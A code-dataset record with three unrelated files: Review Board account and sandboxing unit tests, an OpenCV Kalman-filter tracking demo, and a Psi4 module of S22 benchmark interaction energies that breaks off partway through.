unregister_account_page_class(MyPage)
def test_add_form_to_page(self):
"""Testing AccountPage.add_form."""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
class MyForm(AccountPageForm):
form_id = 'test-form'
register_account_page_class(MyPage)
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_add_duplicate_form_to_page(self):
"""Testing AccountPage.add_form with duplicate form ID."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
with self.assertRaises(RegistrationError):
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_remove_form_from_page(self):
"""Testing AccountPage.remove_form."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
MyPage.remove_form(MyForm)
self.assertEqual(MyPage.form_classes, [])
def test_remove_unknown_form_from_page(self):
"""Testing AccountPage.remove_form with unknown form."""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
register_account_page_class(MyPage)
with self.assertRaises(ItemLookupError):
MyPage.remove_form(MyForm)
def test_default_form_classes_for_page(self):
"""Testing AccountPage._default_form_classes persistence"""
class MyForm(AccountPageForm):
form_id = 'test-form'
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
form_classes = [MyForm]
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [MyForm])
unregister_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [MyForm])
def test_empty_default_form_classes_for_page(self):
"""Testing AccountPage._default_form_classes with no form_classes"""
class MyPage(AccountPage):
page_id = 'test-page'
page_title = 'Test Page'
class MyForm(AccountPageForm):
form_id = 'test-form'
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
MyPage.add_form(MyForm)
self.assertEqual(MyPage.form_classes, [MyForm])
unregister_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
register_account_page_class(MyPage)
self.assertEqual(MyPage.form_classes, [])
class UsernameTests(TestCase):
"""Unit tests for username rules."""
cases = [
('spaces ', 'spaces'),
('spa ces', 'spaces'),
('CASES', 'cases'),
('CaSeS', 'cases'),
('Spec!al', 'specal'),
('email@example.com', 'email@example.com'),
('da-shes', 'da-shes'),
('un_derscores', 'un_derscores'),
('mu ^lt&^ipl Es', 'multiples'),
]
def test(self):
"""Testing username regex for LDAP/AD backends."""
for orig, new in self.cases:
self.assertEqual(
re.sub(INVALID_USERNAME_CHAR_REGEX, '', orig).lower(),
new)
class TrophyTests(TestCase):
"""Test the Trophy Case."""
fixtures = ['test_users']
def test_is_fish_trophy_awarded_for_new_review_request(self):
"""Testing if a fish trophy is awarded for a new review request."""
user1 = User.objects.get(username='doc')
category = 'fish'
review_request = self.create_review_request(publish=True, id=3223,
submitter=user1)
trophies = Trophy.objects.get_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_fish_trophy_awarded_for_older_review_request(self):
"""Testing if a fish trophy is awarded for an older review request."""
user1 = User.objects.get(username='doc')
category = 'fish'
review_request = self.create_review_request(publish=True, id=1001,
submitter=user1)
del review_request.extra_data['calculated_trophies']
trophies = Trophy.objects.get_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_milestone_trophy_awarded_for_new_review_request(self):
"""Testing if a milestone trophy is awarded for a new review request.
"""
user1 = User.objects.get(username='doc')
category = 'milestone'
review_request = self.create_review_request(publish=True, id=1000,
submitter=user1)
trophies = Trophy.objects.compute_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_milestone_trophy_awarded_for_older_review_request(self):
"""Testing if a milestone trophy is awarded for an older review
request.
"""
user1 = User.objects.get(username='doc')
category = 'milestone'
review_request = self.create_review_request(publish=True, id=10000,
submitter=user1)
del review_request.extra_data['calculated_trophies']
trophies = Trophy.objects.compute_trophies(review_request)
self.assertEqual(trophies[0].category, category)
self.assertTrue(
trophies[0].review_request.extra_data['calculated_trophies'])
def test_is_no_trophy_awarded(self):
"""Testing if no trophy is awarded."""
user1 = User.objects.get(username='doc')
review_request = self.create_review_request(publish=True, id=999,
submitter=user1)
trophies = Trophy.objects.compute_trophies(review_request)
self.assertFalse(trophies)
class SandboxAuthBackend(AuthBackend):
"""Mock authentication backend to test extension sandboxing."""
backend_id = 'test-id'
name = 'test'
supports_change_name = True
supports_change_email = True
supports_change_password = True
def authenticate(self, username, password):
"""Raise an exception to test sandboxing."""
raise Exception
def update_password(self, user, password):
"""Raise an exception to test sandboxing."""
raise Exception
def update_name(self, user):
"""Raise an exception to test sandboxing."""
raise Exception
def update_email(self, user):
"""Raise an exception to test sandboxing."""
raise Exception
class SandboxTests(SpyAgency, TestCase):
"""Test extension sandboxing."""
def setUp(self):
"""Initialize this test case."""
super(SandboxTests, self).setUp()
self.factory = RequestFactory()
self.request = self.factory.get('test')
self.user = User.objects.create_user(username='reviewboard', email='',
password='password')
self.profile = Profile.objects.get_or_create(user=self.user)
self.spy_on(get_enabled_auth_backends,
call_fake=lambda: [SandboxAuthBackend()])
# Suppresses MessageFailure Exception at the end of save()
self.spy_on(messages.add_message,
call_fake=lambda x, y, z: None)
def tearDown(self):
"""Uninitialize this test case."""
super(SandboxTests, self).tearDown()
def test_authenticate_auth_backend(self):
"""Testing sandboxing of AuthBackend.authenticate."""
form = ChangePasswordForm(page=None, request=self.request,
user=self.user)
form.cleaned_data = {
'old_password': self.user.password,
}
self.spy_on(SandboxAuthBackend.authenticate)
self.assertRaisesMessage(
ValidationError,
'Unexpected error when validating the password. '
'Please contact the administrator.',
lambda: form.clean_old_password())
self.assertTrue(SandboxAuthBackend.authenticate.called)
def test_update_password_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_password."""
form = ChangePasswordForm(page=None, request=self.request,
user=self.user)
form.cleaned_data = {
'old_password': self.user.password,
'password1': 'password1',
'password2': 'password1',
}
self.spy_on(SandboxAuthBackend.update_password)
form.save()
self.assertTrue(SandboxAuthBackend.update_password.called)
def test_update_name_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_name."""
form = ProfileForm(page=None, request=self.request, user=self.user)
form.cleaned_data = {
'first_name': 'Barry',
'last_name': 'Allen',
'email': 'flash@example.com',
'profile_private': '',
}
self.user.email = 'flash@example.com'
self.spy_on(SandboxAuthBackend.update_name)
form.save()
self.assertTrue(SandboxAuthBackend.update_name.called)
def test_update_email_auth_backend(self):
"""Testing sandboxing of AuthBackend.update_email."""
form = ProfileForm(page=None, request=self.request, user=self.user)
form.cleaned_data = {
'first_name': 'Barry',
'last_name': 'Allen',
'email': 'flash@example.com',
'profile_private': '',
}
self.user.first_name = 'Barry'
self.user.last_name = 'Allen'
self.spy_on(SandboxAuthBackend.update_email)
form.save()
self.assertTrue(SandboxAuthBackend.update_email.called)
|
davidt/reviewboard
|
reviewboard/accounts/tests.py
|
Python
|
mit
| 19,866
|
[
"VisIt"
] |
f65ed2b4eff13a72a36890ebe52d0fd8ba7964d98677991e08a63055892753cd
|
"""
Tracking of rotating point.
Rotation speed is constant.
Both state and measurements vectors are 1D (a point angle),
Measurement is the real point angle + gaussian noise.
The real and the estimated points are connected with yellow line segment,
the real and the measured points are connected with red line segment.
(if Kalman filter works correctly,
the yellow segment should be shorter than the red one).
Pressing any key (except ESC) will reset the tracking with a different speed.
Pressing ESC will stop the program.
"""
# Python 2/3 compatibility
import sys
PY3 = sys.version_info[0] == 3
if PY3:
long = int
import cv2 as cv
from math import cos, sin, sqrt
import numpy as np
if __name__ == "__main__":
img_height = 500
img_width = 500
kalman = cv.KalmanFilter(2, 1, 0)
code = long(-1)
cv.namedWindow("Kalman")
while True:
state = 0.1 * np.random.randn(2, 1)
kalman.transitionMatrix = np.array([[1., 1.], [0., 1.]])
kalman.measurementMatrix = 1. * np.ones((1, 2))
kalman.processNoiseCov = 1e-5 * np.eye(2)
kalman.measurementNoiseCov = 1e-1 * np.ones((1, 1))
kalman.errorCovPost = 1. * np.ones((2, 2))
kalman.statePost = 0.1 * np.random.randn(2, 1)
while True:
def calc_point(angle):
return (np.around(img_width/2 + img_width/3*cos(angle), 0).astype(int),
np.around(img_height/2 - img_width/3*sin(angle), 1).astype(int))
state_angle = state[0, 0]
state_pt = calc_point(state_angle)
prediction = kalman.predict()
predict_angle = prediction[0, 0]
predict_pt = calc_point(predict_angle)
measurement = kalman.measurementNoiseCov * np.random.randn(1, 1)
# generate measurement
measurement = np.dot(kalman.measurementMatrix, state) + measurement
measurement_angle = measurement[0, 0]
measurement_pt = calc_point(measurement_angle)
# plot points
def draw_cross(center, color, d):
cv.line(img,
(center[0] - d, center[1] - d), (center[0] + d, center[1] + d),
color, 1, cv.LINE_AA, 0)
cv.line(img,
(center[0] + d, center[1] - d), (center[0] - d, center[1] + d),
color, 1, cv.LINE_AA, 0)
img = np.zeros((img_height, img_width, 3), np.uint8)
draw_cross(np.int32(state_pt), (255, 255, 255), 3)
draw_cross(np.int32(measurement_pt), (0, 0, 255), 3)
draw_cross(np.int32(predict_pt), (0, 255, 0), 3)
cv.line(img, state_pt, measurement_pt, (0, 0, 255), 3, cv.LINE_AA, 0)
cv.line(img, state_pt, predict_pt, (0, 255, 255), 3, cv.LINE_AA, 0)
kalman.correct(measurement)
process_noise = sqrt(kalman.processNoiseCov[0,0]) * np.random.randn(2, 1)
state = np.dot(kalman.transitionMatrix, state) + process_noise
cv.imshow("Kalman", img)
code = cv.waitKey(100)
if code != -1:
break
if code in [27, ord('q'), ord('Q')]:
break
cv.destroyWindow("Kalman")
|
myboycrais99/Miscellaneous
|
Tracking/example_2.py
|
Python
|
gpl-3.0
| 3,288
|
[
"Gaussian"
] |
711dce5d1c7b1beaca9363e035f0a0ec0235c42e9cce3adf5674c667b50bd4f5
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
| Database (Hobza) of interaction energies for bimolecular complexes.
| Geometries from Jurecka et al. PCCP 8 1985 (2006).
| First revision to interaction energies (S22A) from Takatani et al. JCP 132 144104 (2010).
| Second revision to interaction energies (S22B) from Marshall et al. JCP 135 194102 (2011).
- **cp** ``'off'`` || ``'on'``
- **rlxd** ``'off'``
- **benchmark**
- ``'S220'`` Jurecka et al. PCCP 8 1985 (2006).
- ``'S22A'`` Takatani et al. JCP 132 144104 (2010).
- |dl| ``'S22B'`` |dr| Marshall et al. JCP 135 194102 (2011).
- **subset**
- ``'small'`` water dimer, methane dimer, ethene-ethine
- ``'large'`` adenine-thymine
- ``'HB'`` hydrogen-bonded systems
- ``'MX'`` mixed-influence systems
- ``'DD'`` dispersion-dominated systems
- ``'S11'`` smaller systems in S22
- ``'WATER'`` water dimer
"""
import qcdb
# <<< S22 Database Module >>>
dbse = 'S22'
# <<< Database Members >>>
HRXN = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]
HRXN_SM = [2, 8, 16]
HRXN_LG = [15]
HB = [1, 2, 3, 4, 5, 6, 7]
MX = [13, 15, 16, 17, 18, 19, 21, 22]
DD = [8, 9, 10, 11, 12, 14, 20]
S11 = [1, 2, 3, 4, 8, 9, 10, 16, 17, 18, 19]
WATER = [2]
# <<< Chemical Systems Involved >>>
RXNM = {} # reaction matrix of reagent contributions per reaction
ACTV = {} # order of active reagents per reaction
ACTV_CP = {} # order of active reagents per counterpoise-corrected reaction
ACTV_SA = {} # order of active reagents for non-supramolecular calculations
for rxn in HRXN:
RXNM[ '%s-%s' % (dbse, rxn)] = {'%s-%s-dimer' % (dbse, rxn) : +1,
'%s-%s-monoA-CP' % (dbse, rxn) : -1,
'%s-%s-monoB-CP' % (dbse, rxn) : -1,
'%s-%s-monoA-unCP' % (dbse, rxn) : -1,
'%s-%s-monoB-unCP' % (dbse, rxn) : -1 }
ACTV_SA['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn) ]
ACTV_CP['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-CP' % (dbse, rxn),
'%s-%s-monoB-CP' % (dbse, rxn) ]
ACTV[ '%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-unCP' % (dbse, rxn),
'%s-%s-monoB-unCP' % (dbse, rxn) ]
# <<< Reference Values >>>
BIND = {}
# Original publication
BIND_S220 = {}
BIND_S220['%s-%s' % (dbse, 1)] = -3.17
BIND_S220['%s-%s' % (dbse, 2)] = -5.02
BIND_S220['%s-%s' % (dbse, 3)] = -18.61
BIND_S220['%s-%s' % (dbse, 4)] = -15.96
BIND_S220['%s-%s' % (dbse, 5)] = -20.65
BIND_S220['%s-%s' % (dbse, 6)] = -16.71
BIND_S220['%s-%s' % (dbse, 7)] = -16.37
BIND_S220['%s-%s' % (dbse, 8)] = -0.53
BIND_S220['%s-%s' % (dbse, 9)] = -1.51
BIND_S220['%s-%s' % (dbse, 10)] = -1.50
BIND_S220['%s-%s' % (dbse, 11)] = -2.73
BIND_S220['%s-%s' % (dbse, 12)] = -4.42
BIND_S220['%s-%s' % (dbse, 13)] = -10.12
BIND_S220['%s-%s' % (dbse, 14)] = -5.22
BIND_S220['%s-%s' % (dbse, 15)] = -12.23
BIND_S220['%s-%s' % (dbse, 16)] = -1.53
BIND_S220['%s-%s' % (dbse, 17)] = -3.28
BIND_S220['%s-%s' % (dbse, 18)] = -2.35
BIND_S220['%s-%s' % (dbse, 19)] = -4.46
BIND_S220['%s-%s' % (dbse, 20)] = -2.74
BIND_S220['%s-%s' % (dbse, 21)] = -5.73
BIND_S220['%s-%s' % (dbse, 22)] = -7.05
# Revision
BIND_S22A = {}
BIND_S22A['%s-%s' % (dbse, 1)] = -3.15
BIND_S22A['%s-%s' % (dbse, 2)] = -5.07
BIND_S22A['%s-%s' % (dbse, 3)] = -18.81
BIND_S22A['%s-%s' % (dbse, 4)] = -16.11
BIND_S22A['%s-%s' % (dbse, 5)] = -20.69
BIND_S22A['%s-%s' % (dbse, 6)] = -17.00
BIND_S22A['%s-%s' % (dbse, 7)] = -16.74
BIND_S22A['%s-%s' % (dbse, 8)] = -0.53
BIND_S22A['%s-%s' % (dbse, 9)] = -1.48
BIND_S22A['%s-%s' % (dbse, 10)] = -1.45
BIND_S22A['%s-%s' % (dbse, 11)] = -2.62
BIND_S22A['%s-%s' % (dbse, 12)] = -4.20
BIND_S22A['%s-%s' % (dbse, 13)] = -9.74
BIND_S22A['%s-%s' % (dbse, 14)] = -4.59
BIND_S22A['%s-%s' % (dbse, 15)] = -11.66
BIND_S22A['%s-%s' % (dbse, 16)] = -1.50
BIND_S22A['%s-%s' % (dbse, 17)] = -3.29
BIND_S22A['%s-%s' % (dbse, 18)] = -2.32
BIND_S22A['%s-%s' % (dbse, 19)] = -4.55
BIND_S22A['%s-%s' % (dbse, 20)] = -2.71
BIND_S22A['%s-%s' % (dbse, 21)] = -5.62
BIND_S22A['%s-%s' % (dbse, 22)] = -7.09
# Current revision
BIND_S22B = {}
BIND_S22B['%s-%s' % (dbse, 1)] = -3.133
BIND_S22B['%s-%s' % (dbse, 2)] = -4.989
BIND_S22B['%s-%s' % (dbse, 3)] = -18.753
BIND_S22B['%s-%s' % (dbse, 4)] = -16.062
BIND_S22B['%s-%s' % (dbse, 5)] = -20.641
BIND_S22B['%s-%s' % (dbse, 6)] = -16.934
BIND_S22B['%s-%s' % (dbse, 7)] = -16.660
BIND_S22B['%s-%s' % (dbse, 8)] = -0.527
BIND_S22B['%s-%s' % (dbse, 9)] = -1.472
BIND_S22B['%s-%s' % (dbse, 10)] = -1.448
BIND_S22B['%s-%s' % (dbse, 11)] = -2.654
BIND_S22B['%s-%s' % (dbse, 12)] = -4.255
BIND_S22B['%s-%s' % (dbse, 13)] = -9.805
BIND_S22B['%s-%s' % (dbse, 14)] = -4.524
BIND_S22B['%s-%s' % (dbse, 15)] = -11.730
BIND_S22B['%s-%s' % (dbse, 16)] = -1.496
BIND_S22B['%s-%s' % (dbse, 17)] = -3.275
BIND_S22B['%s-%s' % (dbse, 18)] = -2.312
BIND_S22B['%s-%s' % (dbse, 19)] = -4.541
BIND_S22B['%s-%s' % (dbse, 20)] = -2.717
BIND_S22B['%s-%s' % (dbse, 21)] = -5.627
BIND_S22B['%s-%s' % (dbse, 22)] = -7.097
# Set default
BIND = BIND_S22B
# <<< Comment Lines >>>
TAGL = {}
TAGL['%s-%s' % (dbse, 1)] = 'HB-1 Ammonia Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 1)] = 'Ammonia Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 1)] = 'Ammonia from Ammonia Dimer'
TAGL['%s-%s' % (dbse, 2)] = 'HB-2 Water Dimer, CS'
TAGL['%s-%s-dimer' % (dbse, 2)] = 'Water Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 2)] = 'Water from Water Dimer'
TAGL['%s-%s' % (dbse, 3)] = 'HB-3 Formic Acid Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 3)] = 'Formic Acid Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 3)] = 'Formic Acid from Formic Acid Dimer'
TAGL['%s-%s' % (dbse, 4)] = 'HB-4 Formamide Dimer, C2H'
TAGL['%s-%s-dimer' % (dbse, 4)] = 'Formamide Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 4)] = 'Formamide from Formamide Dimer'
TAGL['%s-%s' % (dbse, 5)] = 'HB-5 Uracil Dimer HB, C2H'
TAGL['%s-%s-dimer' % (dbse, 5)] = 'Uracil Dimer HB'
TAGL['%s-%s-monoA-CP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoB-CP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoA-unCP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s-monoB-unCP' % (dbse, 5)] = 'Uracil from Uracil Dimer HB'
TAGL['%s-%s' % (dbse, 6)] = 'HB-6 2-Pyridone-2-Aminopyridine Complex, C1'
TAGL['%s-%s-dimer' % (dbse, 6)] = '2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 6)] = '2-Pyridone from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 6)] = '2-Aminopyridine from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 6)] = '2-Pyridone from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 6)] = '2-Aminopyridine from 2-Pyridone-2-Aminopyridine Complex'
TAGL['%s-%s' % (dbse, 7)] = 'HB-7 Adenine-Thymine Complex WC, C1'
TAGL['%s-%s-dimer' % (dbse, 7)] = 'Adenine-Thymine Complex WC'
TAGL['%s-%s-monoA-CP' % (dbse, 7)] = 'Adenine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoB-CP' % (dbse, 7)] = 'Thymine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoA-unCP' % (dbse, 7)] = 'Adenine from Adenine-Thymine Complex WC'
TAGL['%s-%s-monoB-unCP' % (dbse, 7)] = 'Thymine from Adenine-Thymine Complex WC'
TAGL['%s-%s' % (dbse, 8)] = 'DD-1 Methane Dimer, D3D'
TAGL['%s-%s-dimer' % (dbse, 8)] = 'Methane Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 8)] = 'Methane from Methane Dimer'
TAGL['%s-%s' % (dbse, 9)] = 'DD-2 Ethene Dimer, D2D'
TAGL['%s-%s-dimer' % (dbse, 9)] = 'Ethene Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 9)] = 'Ethene from Ethene Dimer'
TAGL['%s-%s' % (dbse, 10)] = 'DD-3 Benzene-Methane Complex, C3'
TAGL['%s-%s-dimer' % (dbse, 10)] = 'Benzene-Methane Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 10)] = 'Benzene from Benzene-Methane Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 10)] = 'Methane from Benzene-Methane Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 10)] = 'Benzene from Benzene-Methane Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 10)] = 'Methane from Benzene-Methane Complex'
TAGL['%s-%s' % (dbse, 11)] = 'DD-4 Benzene Dimer Parallel-Disp, C2H'
TAGL['%s-%s-dimer' % (dbse, 11)] = 'Benzene Dimer PD'
TAGL['%s-%s-monoA-CP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoB-CP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoA-unCP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s-monoB-unCP' % (dbse, 11)] = 'Benzene from Benzene Dimer PD'
TAGL['%s-%s' % (dbse, 12)] = 'DD-6 Pyrazine Dimer, CS'
TAGL['%s-%s-dimer' % (dbse, 12)] = 'Pyrazine Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoB-CP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 12)] = 'Pyrazine from Pyrazine Dimer'
TAGL['%s-%s' % (dbse, 13)] = 'MX-5 Uracil Dimer Stack, C2'
TAGL['%s-%s-dimer' % (dbse, 13)] = 'Uracil Dimer Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 13)] = 'Uracil from Uracil Dimer Stack'
TAGL['%s-%s' % (dbse, 14)] = 'DD-7 Indole-Benzene Complex Stack, C1'
TAGL['%s-%s-dimer' % (dbse, 14)] = 'Indole-Benzene Complex Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 14)] = 'Benzene from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 14)] = 'Indole from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 14)] = 'Benzene from Indole-Benzene Complex Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 14)] = 'Indole from Indole-Benzene Complex Stack'
TAGL['%s-%s' % (dbse, 15)] = 'MX-8 Adenine-Thymine Complex Stack, C1'
TAGL['%s-%s-dimer' % (dbse, 15)] = 'Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoA-CP' % (dbse, 15)] = 'Adenine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoB-CP' % (dbse, 15)] = 'Thymine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoA-unCP' % (dbse, 15)] = 'Adenine from Adenine-Thymine Complex Stack'
TAGL['%s-%s-monoB-unCP' % (dbse, 15)] = 'Thymine from Adenine-Thymine Complex Stack'
TAGL['%s-%s' % (dbse, 16)] = 'MX-1 Ethene-Ethine Complex, C2V'
TAGL['%s-%s-dimer' % (dbse, 16)] = 'Ethene-Ethine Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 16)] = 'Ethene from Ethene-Ethine Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 16)] = 'Ethine from Ethene-Ethine Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 16)] = 'Ethene from Ethene-Ethine Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 16)] = 'Ethine from Ethene-Ethine Complex'
TAGL['%s-%s' % (dbse, 17)] = 'MX-2 Benzene-Water Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 17)] = 'Benzene-Water Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 17)] = 'Benzene from Benzene-Water Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 17)] = 'Water from Benzene-Water Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 17)] = 'Benzene from Benzene-Water Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 17)] = 'Water from Benzene-Water Complex'
TAGL['%s-%s' % (dbse, 18)] = 'MX-3 Benzene-Ammonia Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 18)] = 'Benzene-Ammonia Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 18)] = 'Benzene from Benzene-Ammonia Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 18)] = 'Ammonia from Benzene-Ammonia Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 18)] = 'Benzene from Benzene-Ammonia Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 18)] = 'Ammonia from Benzene-Ammonia Complex'
TAGL['%s-%s' % (dbse, 19)] = 'MX-4 Benzene-HCN Complex, CS'
TAGL['%s-%s-dimer' % (dbse, 19)] = 'Benzene-HCN Complex'
TAGL['%s-%s-monoA-CP' % (dbse, 19)] = 'Benzene from Benzene-HCN Complex'
TAGL['%s-%s-monoB-CP' % (dbse, 19)] = 'HCN from Benzene-HCN Complex'
TAGL['%s-%s-monoA-unCP' % (dbse, 19)] = 'Benzene from Benzene-HCN Complex'
TAGL['%s-%s-monoB-unCP' % (dbse, 19)] = 'HCN from Benzene-HCN Complex'
TAGL['%s-%s' % (dbse, 20)] = 'DD-5 Benzene Dimer T-Shape, C2V'
TAGL['%s-%s-dimer' % (dbse, 20)] = 'Benzene Dimer T-Shape'
TAGL['%s-%s-monoA-CP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoB-CP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoA-unCP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s-monoB-unCP' % (dbse, 20)] = 'Benzene from Benzene Dimer T-Shape'
TAGL['%s-%s' % (dbse, 21)] = 'MX-6 Indole-Benzene Complex T-Shape, C1'
TAGL['%s-%s-dimer' % (dbse, 21)] = 'Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoA-CP' % (dbse, 21)] = 'Benzene from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoB-CP' % (dbse, 21)] = 'Indole from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoA-unCP' % (dbse, 21)] = 'Benzene from Indole-Benzene Complex T-Shape'
TAGL['%s-%s-monoB-unCP' % (dbse, 21)] = 'Indole from Indole-Benzene Complex T-Shape'
TAGL['%s-%s' % (dbse, 22)] = 'MX-7 Phenol Dimer, C1'
TAGL['%s-%s-dimer' % (dbse, 22)] = 'Phenol Dimer'
TAGL['%s-%s-monoA-CP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
